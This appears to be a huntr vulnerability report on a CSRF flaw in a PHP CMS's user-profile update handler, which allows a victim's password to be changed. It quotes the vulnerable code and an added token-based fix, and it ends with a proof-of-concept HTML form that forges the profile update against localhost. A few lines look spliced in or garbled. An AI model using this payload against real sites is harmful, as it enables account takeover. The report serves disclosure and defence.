huntr | breakalegcml | 166006A4-ABBB-4644-98F2-4E0F33F63713
History: Jul 30, 2022 - 11:04 a.m.

CSRF vulnerability exists in modifying user information (including password)

2022-07-30 11:04:15
breakalegcml
www.huntr.dev
8

Description

CSRF vulnerability in the user information modification page: the POST handler that updates the member record accepts any request carrying the victim's session cookie, with no anti-CSRF token or origin check, so a page under an attacker's control can change the logged-in user's profile fields, including the password.

Proof of Concept

In \app\home\c\UserController (excerpt of the userinfo POST handler):

```php
// The submitted fields in $w are written straight to the member row.
// Nothing here verifies that the request was issued by the application's
// own form, so a cross-site POST with the victim's cookies is accepted.
$re = M('member')->update(['id' => $this->member['id']], $w);
$member = M('member')->find(['id' => $this->member['id']]);
unset($member['pass']);
$_SESSION['member'] = array_merge($_SESSION['member'], $member);
if ($this->frparam('ajax')) {
    // '修改成功!' means "modified successfully!"
    JsonReturn(['code' => 0, 'msg' => JZLANG('修改成功!')]);
}
Error(JZLANG('修改成功!'));
```
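The fix is to tie each state-changing request to a secret the cross-site page cannot read. The following is an added example of a synchronizer-token check in plain PHP; it is not code from the project or from this report, and the function names, the session key and the form field name are assumptions:

```php
<?php
// Added example (not the project's code): synchronizer-token CSRF check.
// Assumed names: csrf_token(), csrf_valid(), $_SESSION['csrf_token'],
// and a hidden form field also called csrf_token.

// Issue one unguessable token per session and embed it in the profile form.
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 32 random bytes, hex-encoded; a third-party page cannot read it.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Validate the token that arrived with a state-changing request.
// Returns false on any mismatch; the caller must abort before the update.
function csrf_valid(array $post, array $server): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    // Constant-time comparison so a wrong token leaks no timing information.
    if (!hash_equals($expected, $given)) {
        return false;
    }
    // Defence in depth: if the browser sent an Origin header it must be ours.
    if (isset($server['HTTP_ORIGIN'])) {
        $origin = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        $host   = explode(':', $server['HTTP_HOST'] ?? '')[0];
        return $origin !== false && $origin === $host;
    }
    return true;
}

// In the profile form template:
//   <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
// In the POST handler, before M('member')->update(...):
//   if (!csrf_valid($_POST, $_SERVER)) { http_response_code(403); exit('invalid CSRF token'); }
```

Setting the session cookie with SameSite=Lax (session_set_cookie_params(['samesite' => 'Lax'])) blocks the cross-site POST in current browsers as well, but the token check is what makes the handler safe regardless of cookie policy.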
// PoC.html
var payload = ...

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/user/userinfo.html" method="POST">
      <input type="hidden" name="username" value="rA5OOQ" />
      <input type="hidden" name="sex" value="0" />
      <input type="hidden" name="litpic" value="" />
      <input type="hidden" name="file_litpic" value="" />
      <input type="hidden" name="tel" value="111111111111" />
      <input type="hidden" name="email" value="111111123" />
      <input type="hidden" name="province" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="signature" value="" />
      <input type="hidden" name="birthday" value="" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="repassword" value="" />
      <input type="hidden" name="invite" value="http://localhost/login/register.html?invite=1" />
      <input type="hidden" name="submit" value="��¤" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```